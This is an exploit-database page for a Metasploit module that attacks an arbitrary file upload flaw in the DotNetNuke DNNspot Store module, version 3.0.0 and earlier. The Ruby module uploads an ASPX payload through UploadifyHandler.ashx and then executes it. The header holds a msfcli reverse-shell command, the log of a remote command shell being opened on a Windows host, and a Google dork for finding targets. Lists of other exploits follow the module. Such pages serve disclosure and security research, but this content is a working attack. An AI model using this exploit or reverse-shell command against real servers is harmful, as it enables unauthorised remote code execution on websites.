Menu

Search for hundreds of thousands of exploits

"DotNetNuke DNNspot Store 3.0.0 - Arbitrary File Upload (Metasploit)"

Author

Exploit author

"Glafkos Charalambous"

Platform

Exploit platform

windows

Release date

Exploit published date

2014-10-22

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
# Exploit Title: DotNetNuke DNNspot Store (UploadifyHandler.ashx) <= 3.0.0 Arbitary File Upload
# Date: 23/01/2014
# Author: Glafkos Charalambous
# Version: 3.0.0
# Vendor: DNNspot
# Vendor URL: https://www.dnnspot.com
# Google Dork: inurl:/DesktopModules/DNNspot-Store/
#
# root@kali:~# msfcli exploit/windows/http/dnnspot_upload_exec payload=windows/shell/reverse_tcp LHOST=192.168.13.37 LPORT=31337 RHOST=192.168.31.33 RPORT=80 E
# [*] Initializing modules...
# payload => windows/shell/reverse_tcp
# LHOST => 192.168.13.37
# LPORT => 31337
# RHOST => 192.168.31.33
# [-] Handler failed to bind to 192.168.13.37:31337
# [*] Started reverse handler on 0.0.0.0:31337 
# [*] 192.168.31.33:80 - Uploading payload...
# [*] 192.168.31.33:80 - Executing payload trrnegmv.aspx
# [*] Encoded stage with x86/shikata_ga_nai
# [*] Sending encoded stage (267 bytes) to 192.168.31.33
# [*] Command shell session 1 opened (192.168.13.37:31337 -> 192.168.31.33:56806) at 2014-08-28 20:56:23 +0300
# [+] Deleted trrnegmv.aspx
# 
# Microsoft Windows [Version 6.2.9200]
# (c) 2012 Microsoft Corporation. All rights reserved.
# 
# C:\Windows\SysWOW64\inetsrv>
#


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DotNetNuke DNNspot Store (UploadifyHandler.ashx) <= 3.0.0 Arbitary File Upload',
      'Description'    => %q{
        This module exploits an arbitrary file upload vulnerability found in DotNetNuke DNNspot Store
		module versions below 3.0.0.
      },
      'Author'         =>
        [
          'Glafkos Charalambous <glafkos.charalambous[at]unithreat.com>'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://metasploit.com' ]
        ],
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Privileged'     => false,
      'Targets'        =>
        [
          [ 'DNNspot-Store / Windows', {} ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 21 2014'))
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri("DesktopModules/DNNspot-Store/Modules/Admin/UploadifyHandler.ashx")
    })

    if res and res.code == 200
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    @payload_name = "#{rand_text_alpha_lower(8)}.aspx"
    exe  = generate_payload_exe
    aspx  = Msf::Util::EXE.to_exe_aspx(exe)
    post_data = Rex::MIME::Message.new
    post_data.add_part(aspx, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    post_data.add_part("/DesktopModules/DNNspot-Store/ProductPhotos/", nil, nil, "form-data; name=\"folder\"")
    post_data.add_part("1", nil, nil, "form-data; name=\"productId\"")
    post_data.add_part("w00t", nil, nil, "form-data; name=\"type\"")
    data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload...")
    res = send_request_cgi({
      "method" => "POST",
      "uri"    => normalize_uri("DesktopModules/DNNspot-Store/Modules/Admin/UploadifyHandler.ashx"),
      "data"   => data,
      "ctype"  => "multipart/form-data; boundary=#{post_data.bound}"
    })

    unless res and res.code == 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    register_files_for_cleanup(@payload_name)

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_cgi({
	  'method' => 'GET',
      'uri'    => normalize_uri("/DesktopModules/DNNspot-Store/ProductPhotos/",@payload_name)
    })
  end
end
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2017-12-27 "DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit)" webapps aspx "Glafkos Charalambous"
2015-09-08 "Cisco Sourcefire User Agent 2.2 - Insecure File Permissions" local windows "Glafkos Charalambous"
2015-03-14 "Intel Network Adapter Diagnostic Driver - IOCTL Handling" dos windows "Glafkos Charalambous"
2015-01-22 "Cisco Ironport Appliances - Privilege Escalation" remote hardware "Glafkos Charalambous"
2014-10-22 "DotNetNuke DNNspot Store 3.0.0 - Arbitrary File Upload (Metasploit)" webapps windows "Glafkos Charalambous"
2014-10-22 "iBackup 10.0.0.32 - Local Privilege Escalation" local windows "Glafkos Charalambous"
2013-06-24 "Alienvault Open Source SIEM (OSSIM) 4.1 - Multiple SQL Injection Vulnerabilities" webapps php "Glafkos Charalambous"
2012-09-20 "Thomson Wireless VoIP Cable Modem - Authentication Bypass" webapps hardware "Glafkos Charalambous"
2011-06-04 "OpenDrive 1.3.141 - Local Password Disclosure" local windows "Glafkos Charalambous"
2011-06-04 "Xitami Web Server 2.5b4 - Remote Buffer Overflow (Egghunter)" remote windows "Glafkos Charalambous"
2010-08-25 "Adobe Premier Pro CS4 - 'ibfs32.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-25 "Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-25 "Skype 4.2.0.169 - 'wab32.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-25 "Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-25 "Adobe Device Central CS5 - 'qtcf.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-25 "Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-24 "TeamViewer 5.0.8703 - 'dwmapi.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-24 "Adobe Dreamweaver CS4 - 'ibfs32.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-24 "Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-17 "Triologic Media Player 8 - '.m3u' Universal Unicode Local Buffer Overflow (SEH)" local windows "Glafkos Charalambous"
2010-08-16 "MUSE 4.9.0.006 - '.m3u' Local Buffer Overflow" local windows "Glafkos Charalambous"
2010-08-16 "MUSE 4.9.0.006 - '.pls' Universal Local Buffer Overflow (SEH)" local windows "Glafkos Charalambous"
2010-08-11 "EasyFTP Server 1.7.0.11 - (Authenticated) Multiple Commands Remote Buffer Overflows" remote windows "Glafkos Charalambous"
2009-01-11 "DZcms 3.1 - SQL Injection" webapps php "Glafkos Charalambous"
2008-11-24 "WebStudio CMS - Blind SQL Injection" webapps php "Glafkos Charalambous"
2007-06-07 "WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities" webapps php "Glafkos Charalambous"
2007-06-04 "WebStudio CMS - 'index.php' Cross-Site Scripting" webapps php "Glafkos Charalambous"
2007-06-01 "Evenzia Content Management Systems (CMS) - Cross-Site Scripting" webapps php "Glafkos Charalambous"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.